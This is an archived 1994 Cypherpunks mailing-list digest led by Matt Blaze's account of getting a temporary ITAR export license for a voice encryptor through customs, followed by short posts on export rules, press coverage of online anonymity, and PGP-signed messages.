The device in question is an AT&T ``Telephone Security Device (TSD)'', model 3600-F. This is the ``bump in a cord'' voice encryptor. The ``F'' model is supposed to be approved for ``fast track'' export; it doesn't use Clipper or DES, but rather some ``exportable'' algorithm. This model is aimed primarily, I presume, at international business travelers who want to communicate in a reasonably secure manner with their home offices in the states. In other words, a typical user carries it with him or her when traveling abroad. The particular options that I got for the device included a James Bond-ish looking acoustic coupler and handset for dealing with the hardwired phones that are common in European hotel rooms.

About two months before my trip I called our (AT&T's) export lawyer division. It turns out that while there was some discussion in the government about exempting from the export licensing process temporary exports of cryptographic equipment used on business trips, this exemption never actually took effect. So even though the device I had was already approved for sale abroad, I still needed to get a temporary export license. But they assured me that ``this is an easy, routine process''.

Well, sure enough, about two weeks before I was to leave I got back my official US State Department ``license for the temporary export of unclassified defense articles''. So far, so good.
According to the information printed on the license and additional information from the lawyer, I have to leave from an international airport with a customs agent present (no problem there). At the airport, I have to fill out a form called a ``shipper's export declaration'' (SED) on which I have to declare that ``these commodities are authorized by the US government for export only to Belgium and the United Kingdom [the countries I'm visiting]. They may not be resold, transshipped, or otherwise disposed of in any country, either in their original form or incorporated into other end-items without the prior written approval of the US Department of State''. Then I'm to present the SED and export license to a customs official at the airport before I leave. The Customs officer is supposed to take my SED and endorse my license to show what I'm actually taking out of the country. On the way back in, I'm supposed to ``declare'' my item (even though it was manufactured in the US) and show them my license, and they're supposed to endorse the license again to show that I have, in fact, returned the ``defense article''. The first hitch I ran into was that no one could actually tell me where I could get an SED form. But when I called customs they assured me that this was no big deal. ``Just come by customs at the airport, and we stamp the form. I guess you can just fill out the SED there'' they said, assuring me this is not a big deal. I made sure to get to the airport early anyway. Although there was moderately heavy traffic near the airport, I made it to JFK two and a half hours before my 10pm flight. I was flying United, which has their own terminal at JFK, so Customs has an office right there in the same building from which I was to depart (JFK is awful to get around, so I was glad for this). I checked in for my flight (and got upgraded to first class, which bolstered my expectation that everything was going to be really easy from here on). 
Then, luggage, license and TSD in hand, I made my way downstairs to Customs, expecting to fill out the SED form and ``just have my license stamped'' as they had assured me earlier on the telephone. I explained my situation to the security guard whose job is to keep people from going in to the Customs area, and he led me to ``the back office'' without much argument or delay. The head uniformed customs guy in the back office (which I think is same office where they take the people suspected of being ``drug mules'' with cocaine-filled condoms in their stomachs) looked approachable enough. He had a sort of kindly, grandfatherly manner, and he was playing ``Doom'' on a laptop computer. I got the impression that most of the people he encounters are suspected drug smugglers, and he seemed pleased enough to be dealing with something a little different from the norm.

When I explained what I was doing he looked at me as if I had just announced that I was a citizen of Mars who hadn't even bothered to obtain a Visa before leaving. He explained, carefully, that a) I really do need the SED form; b) Not only that, I should have already filled it out, in duplicate; c) He doesn't have blank SED forms; d) he, like everyone else in the entire US government that I had spoken to, has no idea where one gets them from, but people must get them from somewhere; and e) it doesn't really matter, because I'm in the wrong place anyway.

I asked him where the right place is. ``The cargo building, of course,'' he explained patiently. I remembered the cargo building because we passed it in the taxi just as the traffic jam began, about half an hour before I got to the United terminal. The airport shuttle bus doesn't stop there. I'd have to call a taxi. ``But I think they're closed now, and even if they were open you'd never make it before your flight'' he helpfully added, saving me the trip. He also complimented me for going to the trouble to get the license. I must have looked hurt and confused.
Eventually he called in some fellow in a suit who must have been his boss.

``Are you the guy who wants to export the fancy gun?'' the fellow in the suit asked me.

``It's not a gun, it's a telephone,'' I responded, with a straight face.

``Why do you have a license to export a telephone?'' Good question, I thought. I explained about the ITAR, and showed him the thing. He agreed that it looked pretty harmless.

The guy in the suit reiterated points a through e almost verbatim (do they rehearse for these things?) and explained about how this is a State Department license, not a Customs license, and this doesn't happen very much because exports usually go via The Cargo Building. He'd love to help me, but the computer in which these things get entered is over in Cargo. ``That's how the records get made. But you do have a valid license, which is nice.'' He also suggested that I would have an easier time had I shipped the device instead of carrying it with me.

I asked what I should do, given that my plane was scheduled to leave in less than an hour. Neither was sure, but the fellow in the suit seemed willing to leave it to the discretion of the uniformed guy. ``How does this thing work, anyway?'' he asked. I tried to explain as best as I could, trying to make it sound as harmless as it is. ``You mean like that Clipper chip?'' he asked.

At this point, given that he has a laptop and knows something about the Clipper chip, I figured that maybe there was some hope of making my flight. Or maybe I was about to spend the night in jail. In my mind, I put it at about a 90:10 hope:jail ratio. Then he asked, ``Do you know about this stuff?'' So we chatted about computers and cryptography for a while.

Finally, the two of them decided that it wouldn't really hurt for them to just sign the form as long as I promise to call my lawyer and get the SED situation straightened out ASAP. They assured me that I won't be arrested or have any other trouble upon my return.
I made my flight, validated license in hand.

An aside: Throughout my trip, I discovered an interesting thing about the TSD and the various options I was carrying with it. Under X-ray examination, it looks just like some kind of bomb. (I suspect it was the coiled handset cords). Every time I went through a security checkpoint, I had to dig the thing out of my luggage and show it to the guard. I almost missed the new ``Eurostar'' chunnel train (3hrs 15mins nonstop London->Brussels, airport-style checkin and security) as the guards were trying to figure out whether the thing was about to explode.

On the way back to the US, it took me a little over an hour to get through Customs. I carried all my luggage with me, and, expecting a bit of a hassle, made sure to be the FIRST person to reach Customs. The inspector was ready to wordlessly accept my declaration form and send me on my way when I opened my mouth and explained that I needed to get my export license stamped. The inspector explained that this had to be done by something called the ``Ships Office''. I was sent to an unoccupied back room (a different back room than before), and told to wait. I thought about the recent Customs experiences of Phil Zimmermann.

After about half an hour of waiting, an officer came in and asked me what I needed. I explained that I needed to get my export license endorsed, and she shrugged and told me that she had to ``process the flight'' first. As best as I could tell, her job was to clear the airplane itself through customs, that being, technically speaking, a very expensive import. It would take a little while. She was pleasant enough, though, and at least didn't look at me as if she intended to send me to jail or have me strip searched.

Finally, she finished with the plane and asked me for my form. She studied it carefully, obviously having never seen one before, and eventually asked me what, exactly, she was supposed to do.
I explained that I had never actually gone through this process before but I understood that she's supposed to record the fact that I was re-importing the device and stamp my form somewhere. She explained that she didn't know of any place for her to record this. After some discussion, we agreed that the best thing to do was to make a Xerox copy of my license and arrange for it to go wherever it had to go later. She stamped the back of the license and sent me out. It was a little over an hour after I first reached the Customs desk.

My conclusion from all this is that it just isn't possible for an individual traveler to follow the rules. Even having gone through the process now, I still have no idea how to obtain, let alone file, the proper forms, even for a device that's already been determined to be exportable. The export of ITAR-controlled items is ordinarily handled by cargo shipment, not by hand carrying by travelers, and the system is simply not geared to deal with exceptions. Technically speaking, everyone with a laptop disk encryption program who travels internationally is in violation of the ITAR, but since no one actually knows this, no mechanism exists to deal with it.

While (fortunately) everyone I dealt with was sympathetic, no one in the government who I spoke with was actually able to help me follow the rules. I was able to leave and come back only because everyone involved eventually recognized that my telephone was pretty harmless, that my intentions were good, and that the best thing to do was be flexible. Had anyone taken a hard line and tried to enforce the letter of the law, I simply wouldn't have been able to take the thing with me, even with my license. Had I simply taken it with me and come back instead of calling attention to myself by trying to follow the rules, no one would have noticed.

DRAFT - PLEASE DO NOT QUOTE OR REDISTRIBUTE

From jamesd at netcom.com Sat Dec 31 13:54:52 1994
From: jamesd at netcom.com (James A. Donald)
Date: Sat, 31 Dec 94 13:54:52 PST
Subject: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <9412312132.AA11647@merckx.info.att.com>
Message-ID:

On Sat, 31 Dec 1994, Matt Blaze wrote:
> My conclusion from all this is that it just isn't possible for an
> individual traveler to follow the rules. [...]
> Had I simply taken it with me and come back instead of
> calling attention to myself by trying to follow the rules, no one would
> have noticed.

According to my former boss, Kevin Welch, the same is true not only for individual travellers, but for small businesses.

I can see from the letter that you sent before you tried this experiment, that this is the outcome that you expected.

---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.

James A. Donald
jamesd at netcom.com

From jya at pipeline.com Sat Dec 31 13:56:08 1994
From: jya at pipeline.com (John Young)
Date: Sat, 31 Dec 94 13:56:08 PST
Subject: remarkably bad media
Message-ID: <199412312156.QAA09707@pipe2.pipeline.com>

Responding to msg by perry at imsi.com (Perry E. Metzger) on Sat, 31 Dec 12:39 PM

Perry makes an astute critique about the Peter Lewis article today on anonymity. I hope that he or someone takes the time to write The Times with polite corrections or a cataclysmic attack.

I would note that the two law professors quoted are active on mail list Cyberia-L, where many of the cypherpunks issues are debated from a legal perspective. Peter Lewis is a subscriber to that list.

Peter Lewis wrote yesterday about the LaMacchia case dismissal. The article was reprinted verbatim today. It too focussed on the need for legislation. (Todd posted Reuter's version.)

Is it any wonder that lawyers are quoted when enhanced law and order are immanent?
Mike Godwin, of EFF and also a Cyberia-L subscriber, takes a dissenting view from that presented by those quoted by Lewis. Or so I would judge from his posts on the LaMacchia case.

My one-cent's worth to the anonymity topic is that The NYT may be drum-beating for legislation to regulate anonymity -- a characteristically paternalistic role of the self-important power-brokering running-dog mad-dog yellow-dog hyena-slobbering anarchy-hating media.

Oops, sorry for that anonymous slip. Back to totally disinterested objectivity, eye-of-god, slug-under-rock-safety.

Say, if anyone wants the Lewis article on LaMacchia, send blank message with subject: LAM_not

From raph at netcom.com Sat Dec 31 15:11:47 1994
From: raph at netcom.com (Raph Levien)
Date: Sat, 31 Dec 94 15:11:47 PST
Subject: remarkably bad media
In-Reply-To: <9412311739.AA09311@webster.imsi.com>
Message-ID: <199412312311.PAA10378@netcom14.netcom.com>

-----BEGIN PGP SIGNED MESSAGE-----

This is really the first line of this message. Ignore the line below -- it was added by mistake by my autosigning scripts. Also, I was completely thrilled by the Peter Lewis article. Now that I've thought about it some more, the Microsoft hoax _was_ a problem with anonymity. Please just disregard the rest of this post. Thanks. -- Raph

This is the first line of this message.

I agree with Perry that the article has some serious problems. Very little of the actual stuff he talked about has anything to do with anonymity at all, especially with anonymous remailers.

I was interviewed but not quoted. I mostly talked about the remailers, their political situation (the fact that the average half-life of a remailer seems to be about six months), and what my role is in trying to make the whole mess useable.

When I talked to him on the phone, Peter seemed pretty clear about the distinction between spoofing someone else's identity and being anonymous. However, I don't think this distinction made it into print.
The sidebar was particularly problematical. It presented digital signatures as a relief for the problems posed by anonymity. Well, of course I think digital signatures are a wonderful idea (which is why I've signed this post), but it certainly won't protect anybody against being exposed to disturbing ideas that are disseminated anonymously. Thus, I would consider the sidebar to be misleading.

I first saw the Microsoft spoof posted to rec.humor.funny. I don't recall it being anonymous, and even if it was, it was clearly labeled as a joke. Any problems it caused are due to human gullibility. I found it to be a great demonstration of how effective the AP inverted-pyramid style is in conveying misinformation.

I can sympathize with Peter a bit, having just written an article for Wired magazine (Feb '94, pp. 68-69). They used about half of the text I originally wrote. My hard-headed skeptical review of stochastic screening techniques was transformed into Wired's trademark gee-whiz boosterism.

As the NYT article appeared, I'm just as happy that I wasn't quoted.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLwXjPf4BfQiT0bDNAQHN6wP7BqDsLWaSxGu4wet8OaJ0duPMwChXpzAA
ryjQOTFsqkz5tWMGBcE5iz+4wAj1lZI2NcX2Y6QF+OPBBMFItmFoIyr1VLYCMUaT
nfaTmQBoLPOvgv9nNILuYNd2quBQzQR7yODqUGciBPQk281ao/hgoJjCxg79mbVd
SoMUGjNgcM4=
=ywCF
-----END PGP SIGNATURE-----

PGP key available by fingering raph at netcom.com

From CCGARY at MIZZOU1.missouri.edu Sat Dec 31 18:00:44 1994
From: CCGARY at MIZZOU1.missouri.edu (Gary Jeffers)
Date: Sat, 31 Dec 94 18:00:44 PST
Subject: Fake signature - cover charge
Message-ID: <199501010206.VAA23118@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Well, is this file going to be posted on Cypherpunks with a fake signature, or will it just annoy L. Todd Masco? On my last post to Cypherpunks, I legit. signed it with my very own military grade PGP signature & included armored public key.
Eric Hughes: It looks like this mandatory signing thing just isn't keeping out the Riff-Raft! How about a cover charge instead?

PUSH EM BACK! PUSH EM BACK! WWWAAAYYY BBBAAACCCK! BBBEEEAAATTTT STATE!

Gary Jeffers

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwYOASoZzwIn1bdtAQFIeAGAmD7jANYl7GTXU5qkeW271Fs5jYJUdnDZ
elG+SsJvG1RFs7CM82DlvAaMxVT62vHa
=Ue1R
-----END PGP SIGNATURE-----

From crawford at scruznet.com Sat Dec 31 18:34:27 1994
From: crawford at scruznet.com (Michael D. Crawford)
Date: Sat, 31 Dec 94 18:34:27 PST
Subject: From Me to You for the Coming Year....*giggle*
Message-ID: <199501010234.SAA04913@scruz.net>

Carol Anne Braddock sez...

>'##::::'##::::'###::::'########::'########::'##:::'##:

... etc.

An interesting form of steganography. Is there a prize for determining the secret message?

And Happy New Year to you, too!

Cheers,

Michael D. Crawford
crawford at scruznet.com <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.